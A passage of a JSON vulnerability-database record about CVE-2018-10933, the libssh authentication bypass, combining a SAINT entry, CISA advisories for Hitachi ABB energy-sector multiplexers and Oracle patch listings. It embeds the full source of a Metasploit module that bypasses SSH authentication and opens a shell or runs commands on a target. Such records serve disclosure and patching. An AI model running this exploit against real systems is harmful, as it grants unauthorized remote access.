Problem\n\nA vulnerability in libssh allows remote users to bypass authentication by sending a `**SSH2_MSG_USERAUTH_SUCCESS**` message instead of a `**SSH2_MSG_USERAUTH_REQUEST**` message. \n\n### Resolution\n\n[Upgrade](<https://www.libssh.org/get-it/>) to libssh 0.7.6 or 0.8.4 or higher, or install a fix from your operating system vendor. \n\n### References\n\n<https://www.libssh.org/security/advisories/CVE-2018-10933.txt> \n \n\n", "edition": 2, "modified": "2018-10-29T00:00:00", "published": "2018-10-29T00:00:00", "id": "SAINT:09E7CC2595E83CD15F6B2622D66DE4D4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/libssh_auth_bypass", "title": "libssh authentication bypass", "type": "saint", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "metasploit": [{"lastseen": "2020-10-14T19:20:15", "description": "This module exploits an authentication bypass in libssh server code where a USERAUTH_SUCCESS message is sent in place of the expected USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 are vulnerable. Note that this module's success depends on whether the server code can trigger the correct (shell/exec) callbacks despite only the state machine's authenticated state being set. Therefore, you may or may not get a shell if the server requires additional code paths to be followed.\n", "published": "2018-10-19T04:03:23", "type": "metasploit", "title": "libssh Authentication Bypass Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10933"], "modified": "2019-03-05T23:21:11", "id": "MSF:AUXILIARY/SCANNER/SSH/LIBSSH_AUTH_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::SSH\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'libssh Authentication Bypass Scanner',\n 'Description' => %q{\n This module exploits an authentication bypass in libssh server code\n where a USERAUTH_SUCCESS message is sent in place of the expected\n USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and\n 0.8.0 through 0.8.3 are vulnerable.\n\n Note that this module's success depends on whether the server code\n can trigger the correct (shell/exec) callbacks despite only the state\n machine's authenticated state being set.\n\n Therefore, you may or may not get a shell if the server requires\n additional code paths to be followed.\n },\n 'Author' => [\n 'Peter Winter-Smith', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2018-10933'],\n ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']\n ],\n 'DisclosureDate' => '2018-10-16',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Shell', 'Description' => 'Spawn a shell'],\n ['Execute', 'Description' => 'Execute a command']\n ],\n 'DefaultAction' => 'Shell'\n ))\n\n register_options([\n Opt::RPORT(22),\n OptString.new('CMD', [false, 'Command or alternative shell']),\n OptBool.new('SPAWN_PTY', [false, 'Spawn a PTY', false]),\n OptBool.new('CHECK_BANNER', [false, 'Check banner for libssh', true])\n ])\n\n register_advanced_options([\n OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),\n OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])\n ])\n end\n\n # Vulnerable since 0.6.0 and patched in 0.7.6 and 0.8.4\n def check_banner(ip, version)\n version =~ /libssh[_-]?([\\d.]*)$/ && $1 && (v = Gem::Version.new($1))\n\n if v.nil?\n vprint_error(\"#{ip}:#{rport} - #{version} does not appear to be libssh\")\n Exploit::CheckCode::Unknown\n elsif v.to_s.empty?\n vprint_warning(\"#{ip}:#{rport} - libssh version not reported\")\n Exploit::CheckCode::Detected\n elsif v.between?(Gem::Version.new('0.6.0'), Gem::Version.new('0.7.5')) ||\n v.between?(Gem::Version.new('0.8.0'), Gem::Version.new('0.8.3'))\n vprint_good(\"#{ip}:#{rport} - #{version} appears to be unpatched\")\n Exploit::CheckCode::Appears\n else\n vprint_error(\"#{ip}:#{rport} - #{version} appears to be patched\")\n Exploit::CheckCode::Safe\n end\n end\n\n def run_host(ip)\n if action.name == 'Execute' && datastore['CMD'].blank?\n fail_with(Failure::BadConfig, 'Execute action requires CMD to be set')\n end\n\n factory = ssh_socket_factory\n\n ssh_opts = {\n port: rport,\n # The auth method is converted into a class name for instantiation,\n # so libssh-auth-bypass here becomes LibsshAuthBypass from the mixin\n auth_methods: ['libssh-auth-bypass'],\n non_interactive: true,\n config: false,\n use_agent: false,\n verify_host_key: :never,\n proxy: factory\n }\n\n ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n print_status(\"#{ip}:#{rport} - Attempting authentication bypass\")\n\n begin\n ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do\n Net::SSH.start(ip, username, ssh_opts)\n end\n rescue Net::SSH::Exception => e\n vprint_error(\"#{ip}:#{rport} - #{e.class}: #{e.message}\")\n return\n end\n\n return unless ssh\n\n version = ssh.transport.server_version.version\n\n # XXX: The OOB authentication leads to false positives, so check banner\n if datastore['CHECK_BANNER']\n return if check_banner(ip, version) !=\n (Exploit::CheckCode::Appears || Exploit::CheckCode::Detected)\n end\n\n report_vuln(\n host: ip,\n name: self.name,\n refs: self.references,\n info: version\n )\n\n shell = Net::SSH::CommandStream.new(ssh, *config)\n\n # XXX: Wait for CommandStream to log a channel request failure\n sleep 0.1\n\n if (e = shell.error)\n print_error(\"#{ip}:#{rport} - #{e.class}: #{e.message}\")\n return\n end\n\n case action.name\n when 'Shell'\n if datastore['CreateSession']\n start_session(self, \"#{self.name} (#{version})\", {}, false, shell.lsock)\n end\n when 'Execute'\n output = shell.channel && (shell.channel[:data] || '').chomp\n\n if output.blank?\n print_error(\"#{ip}:#{rport} - Empty or blank command output\")\n return\n end\n\n print_status(\"#{ip}:#{rport} - Executed: #{datastore['CMD']}\\n#{output}\")\n end\n end\n\n def rport\n datastore['RPORT']\n end\n\n def username\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\n def config\n [\n datastore['CMD'],\n pty: datastore['SPAWN_PTY']\n ]\n end\n\nend\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb"}], "ics": [{"lastseen": "2021-02-27T19:48:27", "bulletinFamily": "info", "cvelist": ["CVE-2018-10933"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.1**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor: **Hitachi ABB Power Grids\n * **Equipment: **FOX615 Multiservice-Multiplexer\n * **Vulnerability:** Improper Authentication\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could allow an attacker remote access to the device without authentication.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports a vulnerability exists in the libssh library included in the following products: \n\n * FOX61x R1 using CESM1/CESM2: All versions prior to cesne_r1h07_12.esw\n * FOX61x R2 using CESM1/CESM2: All versions prior to cesne_r2d14_03.esw\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [IMPROPER AUTHENTICATION CWE-287](<https://cwe.mitre.org/data/definitions/287.html>)\n\nAn attacker can send a specially crafted message to the device causing it to open a communication channel without first performing authentication, which may allow an attacker to execute arbitrary commands. \n\n[CVE-2018-10933](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10933>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids recommends users apply the following firmware:\n\n * FOX61x R1: CESM1/CESM2: Update to Version cesne_r1h07_12.esw or newer\n * FOX61x R2: CESM1/CESM2: Update to Version cesne_r2d14_03.esw or newer\n\nFor additional information and support please contact a [product provider or Hitachi ABB Power Grids service organization](<https://www.hitachiabb-powergrids.com/contact-us/>).\n\nHitachi ABB Power Grids recommends security practices and firewall configurations to help protect a process control network from attacks originating from outside the network. Such practices require process control systems be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by a firewall system that has a minimal number of ports exposed. Other systems must be evaluated on case-by-case basis. Process control systems should not be used for Internet browsing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability. \n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-007-01>); we'd welcome your feedback.\n", "modified": "2021-01-07T00:00:00", "published": "2021-01-07T00:00:00", "id": "ICSA-21-007-01", "href": "https://www.us-cert.gov/ics/advisories/icsa-21-007-01", "type": "ics", "title": "Hitachi ABB Power Grids FOX615 Multiservice-Multiplexer", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-27T19:48:52", "bulletinFamily": "info", "cvelist": ["CVE-2018-10933"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.1**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor: **Hitachi ABB Power Grids\n * **Equipment:** XMC20 Multiservice-Multiplexer\n * **Vulnerability:** Improper Authentication\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could allow an attacker to remotely take control of the product.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports the vulnerability affects the following XMC20 Multiservice-Multiplexer products: \n\n * XMC20 R4 using COGE5 versions older than co5ne_r1h07_12.esw\n * XMC20 R6 using COGE5 versions older than co5ne_r2d14_03.esw\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [IMPROPER AUTHENTICATION CWE-287](<https://cwe.mitre.org/data/definitions/287.html>)\n\nA vulnerability exists in a specific library included in these products. An attacker could exploit the vulnerability by sending a specially crafted message to the XMC20 node to open a communication channel without first performing authentication, resulting in unauthorized access. \n\n[CVE-2018-10933](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10933>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Energy Sector\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids has corrected the problem in the following product versions and recommends users apply the firmware update at the earliest availability:\n\n * XMC20 R4: COGE5 Version co5ne_r1h07_12.esw (and newer)\n * XMC20 R6: COGE5 Version co5ne_r2d14_03.esw (and newer)\n\nFor additional information and support please contact a product provider or a [Hitachi ABB Power Grids service organization](<https://www.hitachiabb-powergrids.com/contact-us/>). \n\nHitachi ABB Power Grids published cybersecurity advisory [PGVU-PGGA-XMC20-2020034](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A2862&LanguageCode=en&DocumentPartId=&Action=Launch>) to give users more information about this issue.\n\nHitachi ABB Power Grids recommends the following cybersecurity practices:\n\n * Physically protect process control systems from direct access by unauthorized personnel.\n * Do not directly connect control systems to the Internet. \n * Separate control systems from other networks by means of a firewall system that has a minimal number of ports exposed.\n * Do not use control systems networks for Internet browsing, instant messaging, or receiving e-mails.\n * Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://www.us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://www.us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability. \n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-20-294-02>); we'd welcome your feedback.\n", "modified": "2020-10-20T00:00:00", "published": "2020-10-20T00:00:00", "id": "ICSA-20-294-02", "href": "https://www.us-cert.gov/ics/advisories/icsa-20-294-02", "type": "ics", "title": "Hitachi ABB Power Grids XMC20 Multiservice-Multiplexer", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "oracle": [{"lastseen": "2019-05-29T18:20:54", "bulletinFamily": "software", "cvelist": ["CVE-2019-2520", "CVE-2019-2509", "CVE-2015-9251", "CVE-2019-2451", "CVE-2017-9798", "CVE-2019-2488", "CVE-2019-2395", "CVE-2019-2470", "CVE-2015-8965", "CVE-2018-1000120", "CVE-2018-0732", "CVE-2019-2444", "CVE-2018-1000180", "CVE-2019-2427", "CVE-2019-2501", "CVE-2019-2400", "CVE-2019-2529", "CVE-2019-2412", "CVE-2019-2525", "CVE-2019-2532", "CVE-2018-3311", "CVE-2019-2512", "CVE-2019-2471", "CVE-2019-2521", "CVE-2018-9206", "CVE-2019-2419", "CVE-2018-1275", "CVE-2019-2496", "CVE-2018-7489", "CVE-2019-2416", "CVE-2019-2474", "CVE-2019-2494", "CVE-2018-0734", "CVE-2019-2460", "CVE-2019-2531", "CVE-2018-5407", "CVE-2019-2437", "CVE-2017-3735", "CVE-2017-7658", "CVE-2019-2489", "CVE-2019-2448", "CVE-2019-2439", "CVE-2018-1271", "CVE-2019-2490", "CVE-2019-2447", "CVE-2018-14719", "CVE-2019-2547", "CVE-2019-2553", "CVE-2018-3246", "CVE-2019-2528", "CVE-2018-1000121", "CVE-2019-2423", "CVE-2019-2549", "CVE-2018-11039", "CVE-2019-2434", "CVE-2019-2541", "CVE-2019-2410", "CVE-2019-2449", "CVE-2018-11307", "CVE-2019-2543", "CVE-2019-2425", "CVE-2019-2544", "CVE-2018-3304", "CVE-2018-14720", "CVE-2015-1832", "CVE-2019-2445", "CVE-2018-10933", "CVE-2019-2506", "CVE-2016-0635", "CVE-2019-2466", "CVE-2019-2438", "CVE-2019-2546", "CVE-2019-2407", "CVE-2019-2417", "CVE-2019-2511", "CVE-2019-2486", "CVE-2018-14718", "CVE-2019-2482", "CVE-2019-2402", "CVE-2019-2406", "CVE-2018-12022", "CVE-2019-2456", "CVE-2016-1182", "CVE-2018-1258", "CVE-2019-2530", "CVE-2015-0852", "CVE-2019-2396", "CVE-2019-2554", "CVE-2018-1000122", "CVE-2019-2465", "CVE-2019-2415", "CVE-2018-3303", "CVE-2019-2472", "CVE-2019-2399", "CVE-2019-2519", "CVE-2019-2497", "CVE-2019-2452", "CVE-2017-9526", "CVE-2019-2513", "CVE-2019-2414", "CVE-2019-2420", "CVE-2018-11776", "CVE-2018-3646", "CVE-2018-11775", "CVE-2018-0735", "CVE-2019-2493", "CVE-2019-2527", "CVE-2019-2479", "CVE-2018-1257", "CVE-2019-2473", "CVE-2019-2536", "CVE-2019-2461", "CVE-2018-14721", "CVE-2019-2552", "CVE-2018-1000300", "CVE-2019-2537", "CVE-2019-2504", "CVE-2019-2477", "CVE-2018-11212", "CVE-2019-2397", "CVE-2014-0114", "CVE-2019-2523", "CVE-2019-2443", "CVE-2019-2421", "CVE-2019-2485", "CVE-2019-2442", "CVE-2019-2401", "CVE-2018-0739", "CVE-2019-2539", "CVE-2019-2426", "CVE-2019-2462", "CVE-2019-2436", "CVE-2019-2534", "CVE-2019-2491", "CVE-2019-2510", "CVE-2019-2411", "CVE-2019-2502", "CVE-2018-1313", "CVE-2018-1000613", "CVE-2019-2535", "CVE-2018-8013", "CVE-2019-2432", "CVE-2019-2487", "CVE-2016-9583", "CVE-2019-2463", "CVE-2019-2469", "CVE-2018-1272", "CVE-2017-7525", "CVE-2019-2545", "CVE-2019-2538", "CVE-2019-2500", "CVE-2019-2398", "CVE-2019-2453", "CVE-2018-3147", "CVE-2019-2498", "CVE-2018-1270", "CVE-2017-13745", "CVE-2019-2555", "CVE-2019-2413", "CVE-2016-9389", "CVE-2018-11763", "CVE-2019-2476", "CVE-2018-0733", "CVE-2019-2404", "CVE-2016-5684", "CVE-2016-1181", "CVE-2017-14735", "CVE-2017-3738", "CVE-2019-2548", "CVE-2019-2507", "CVE-2019-2409", "CVE-2019-2533", "CVE-2018-1000632", "CVE-2019-2503", "CVE-2019-2464", "CVE-2019-2435", "CVE-2018-3309", "CVE-2016-9392", "CVE-2019-2522", "CVE-2018-11784", "CVE-2019-2431", "CVE-2017-5645", "CVE-2019-2405", "CVE-2019-2450", "CVE-2019-2478", "CVE-2019-2429", "CVE-2019-2540", "CVE-2019-2467", "CVE-2018-6922", "CVE-2018-5390", "CVE-2015-7940", "CVE-2016-4000", "CVE-2017-3736", "CVE-2019-2524", "CVE-2019-2556", "CVE-2017-0379", "CVE-2019-2495", "CVE-2019-2480", "CVE-2019-2418", "CVE-2018-0737", "CVE-2019-2433", "CVE-2019-2468", "CVE-2019-2457", "CVE-2019-2526", "CVE-2019-2440", "CVE-2017-15095", "CVE-2018-11040", "CVE-2019-2508", "CVE-2019-2422", "CVE-2019-2550", "CVE-2018-3125", "CVE-2016-6814", "CVE-2017-14229", "CVE-2019-2459", "CVE-2016-1000031", "CVE-2019-2481", "CVE-2018-3639", "CVE-2019-2408", "CVE-2019-2446", "CVE-2018-1000301", "CVE-2018-12023", "CVE-2018-3305", "CVE-2015-4760", "CVE-2019-2458", "CVE-2019-2505", "CVE-2019-2430", "CVE-2019-2492", "CVE-2019-2441", "CVE-2019-2403", "CVE-2019-2475", "CVE-2019-2499", "CVE-2019-2455"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/securityalerts>) for information about Oracle Security Advisories.\n\n \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 284 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2019 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2489117.1>).\n", "modified": "2019-04-18T00:00:00", "published": "2019-01-15T00:00:00", "id": "ORACLE:CPUJAN2019-5072801", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - January 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:15:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-0114", "CVE-2015-0852", "CVE-2015-1832", "CVE-2015-4760", "CVE-2015-7940", "CVE-2015-8965", "CVE-2015-9251", "CVE-2016-0635", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-4000", "CVE-2016-5684", "CVE-2016-6814", "CVE-2016-9389", "CVE-2016-9392", "CVE-2016-9583", "CVE-2017-0379", "CVE-2017-13745", "CVE-2017-14229", "CVE-2017-14735", "CVE-2017-15095", "CVE-2017-3735", "CVE-2017-3736", "CVE-2017-3738", "CVE-2017-5645", "CVE-2017-7525", "CVE-2017-7658", "CVE-2017-9526", "CVE-2017-9798", "CVE-2018-0732", "CVE-2018-0733", "CVE-2018-0734", "CVE-2018-0735", "CVE-2018-0737", "CVE-2018-0739", "CVE-2018-1000120", "CVE-2018-1000121", "CVE-2018-1000122", "CVE-2018-1000180", "CVE-2018-1000300", "CVE-2018-1000301", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-10933", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11212", "CVE-2018-11307", "CVE-2018-11763", "CVE-2018-11775", "CVE-2018-11776", "CVE-2018-11784", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-1313", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-3125", "CVE-2018-3147", "CVE-2018-3246", "CVE-2018-3303", "CVE-2018-3304", "CVE-2018-3305", "CVE-2018-3309", "CVE-2018-3311", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-5390", "CVE-2018-5407", "CVE-2018-6922", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-9206", "CVE-2019-2395", "CVE-2019-2396", "CVE-2019-2397", "CVE-2019-2398", "CVE-2019-2399", "CVE-2019-2400", "CVE-2019-2401", "CVE-2019-2402", "CVE-2019-2403", "CVE-2019-2404", "CVE-2019-2405", "CVE-2019-2406", "CVE-2019-2407", "CVE-2019-2408", "CVE-2019-2409", "CVE-2019-2410", "CVE-2019-2411", "CVE-2019-2412", "CVE-2019-2413", "CVE-2019-2414", "CVE-2019-2415", "CVE-2019-2416", "CVE-2019-2417", "CVE-2019-2418", "CVE-2019-2419", "CVE-2019-2420", "CVE-2019-2421", "CVE-2019-2422", "CVE-2019-2423", "CVE-2019-2425", "CVE-2019-2426", "CVE-2019-2427", "CVE-2019-2429", "CVE-2019-2430", "CVE-2019-2431", "CVE-2019-2432", "CVE-2019-2433", "CVE-2019-2434", "CVE-2019-2435", "CVE-2019-2436", "CVE-2019-2437", "CVE-2019-2438", "CVE-2019-2439", "CVE-2019-2440", "CVE-2019-2441", "CVE-2019-2442", "CVE-2019-2443", "CVE-2019-2444", "CVE-2019-2445", "CVE-2019-2446", "CVE-2019-2447", "CVE-2019-2448", "CVE-2019-2449", "CVE-2019-2450", "CVE-2019-2451", "CVE-2019-2452", "CVE-2019-2453", "CVE-2019-2455", "CVE-2019-2456", "CVE-2019-2457", "CVE-2019-2458", "CVE-2019-2459", "CVE-2019-2460", "CVE-2019-2461", "CVE-2019-2462", "CVE-2019-2463", "CVE-2019-2464", "CVE-2019-2465", "CVE-2019-2466", "CVE-2019-2467", "CVE-2019-2468", "CVE-2019-2469", "CVE-2019-2470", "CVE-2019-2471", "CVE-2019-2472", "CVE-2019-2473", "CVE-2019-2474", "CVE-2019-2475", "CVE-2019-2476", "CVE-2019-2477", "CVE-2019-2478", "CVE-2019-2479", "CVE-2019-2480", "CVE-2019-2481", "CVE-2019-2482", "CVE-2019-2485", "CVE-2019-2486", "CVE-2019-2487", "CVE-2019-2488", "CVE-2019-2489", "CVE-2019-2490", "CVE-2019-2491", "CVE-2019-2492", "CVE-2019-2493", "CVE-2019-2494", "CVE-2019-2495", "CVE-2019-2496", "CVE-2019-2497", "CVE-2019-2498", "CVE-2019-2499", "CVE-2019-2500", "CVE-2019-2501", "CVE-2019-2502", "CVE-2019-2503", "CVE-2019-2504", "CVE-2019-2505", "CVE-2019-2506", "CVE-2019-2507", "CVE-2019-2508", "CVE-2019-2509", "CVE-2019-2510", "CVE-2019-2511", "CVE-2019-2512", "CVE-2019-2513", "CVE-2019-2519", "CVE-2019-2520", "CVE-2019-2521", "CVE-2019-2522", "CVE-2019-2523", "CVE-2019-2524", "CVE-2019-2525", "CVE-2019-2526", "CVE-2019-2527", "CVE-2019-2528", "CVE-2019-2529", "CVE-2019-2530", "CVE-2019-2531", "CVE-2019-2532", "CVE-2019-2533", "CVE-2019-2534", "CVE-2019-2535", "CVE-2019-2536", "CVE-2019-2537", "CVE-2019-2538", "CVE-2019-2539", "CVE-2019-2540", "CVE-2019-2541", "CVE-2019-2543", "CVE-2019-2544", "CVE-2019-2545", "CVE-2019-2546", "CVE-2019-2547", "CVE-2019-2548", "CVE-2019-2549", "CVE-2019-2550", "CVE-2019-2552", "CVE-2019-2553", "CVE-2019-2554", "CVE-2019-2555", "CVE-2019-2556"], "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n * Critical Patch Updates, Security Alerts and Bulletins for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 284 new security fixes across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at January 2019 Critical Patch Update: Executive Summary and Analysis.\n", "modified": "2020-02-13T00:00:00", "published": "2019-01-15T00:00:00", "id": "ORACLE:CPUJAN2019", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
